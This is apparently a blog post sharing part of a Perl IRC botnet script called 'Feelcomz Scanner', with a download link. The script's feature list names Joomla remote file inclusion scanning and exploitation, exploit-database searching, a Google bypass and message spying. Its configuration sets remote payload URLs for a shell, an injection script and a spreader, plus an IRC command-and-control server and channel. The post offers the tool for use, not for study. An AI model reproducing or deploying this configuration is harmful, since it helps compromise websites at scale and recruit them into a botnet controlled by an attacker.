Feelcomz Scanner

Senin, 22 Februari 2010 ·

## + Joomla RFI Scan & Exploit ##
## + Milw0rm Search ##
## + Google bypass (Using PHP) ##
## + Message Spy & Save ##
######################################################
## History:
## + Fixed cryptz command (v4.5)
## + Fixed user commands execution by unauthorized user (v4.6)
## + Added options to enable/disable encrypted password (v4.7)
## + Fixed missing hostname on sublink (v4.8)
## + Added links filter to exclude exploiting bad links (v4.9)

use strict;

use IO::Socket::INET;
use LWP::UserAgent;
use HTTP::Request;

my $versi = "v4.9";
my $cmdpre = "."; #Command Prefix

##[ KONFIGURASI URL ]##
my $fx29id = "http://www.zeja.org/xpzmshxm//data/board/idxx.txt??"; #Fx29ID (Simple) / (Advanced)
my $fx29id2 = "http://www.zeja.org/xpzmshxm//data/board/id2.txt??"; #Fx29ID (Advanced)
my $fx29sh = "http://www.zeja.org/xpzmshxm//data/board/sh.txt??"; #Fx29Sh (Optional)
my $bypass = "http://www.zeja.org/xpzmshxm//data/board/google.php?"; #Google Bypasserz (Optional)

##[ KONFIGURASI SOURCE ]##
my $mysite = "http://www.zeja.org/xpzmshxm//data/board/"; #Path to Sources URL (Optional)
my $spread = $mysite."http://www.zeja.org/xpzmshxm//data/board/ab.txt"; #Fx29Spreadz (Optional)
my $joomlaz = $mysite."bugz/joomla.txt"; #Joomla's Bugs List (Required for Joomla RFI Scanner)

##[ KONFIGURASI IRC ]##
my @servers = ("wantexz.zapto.org"); #IRC Servers (Separated by coma)
my %bot = (
nick => "Palentin[".int(rand(100))."]",
ident => "mama".int(rand(100)),
chan => ["#kill-9"], #Channels to join (Separated by coma)
server => $servers[rand(scalar(@servers))],
port => "7000"
);

##[ KONFIGURASI USER ##
## status: admin, user
## cryptz: 0 = Non-Encrypted Password, 1 = Encrypted Password


Download [lengkap + id]

0 comments: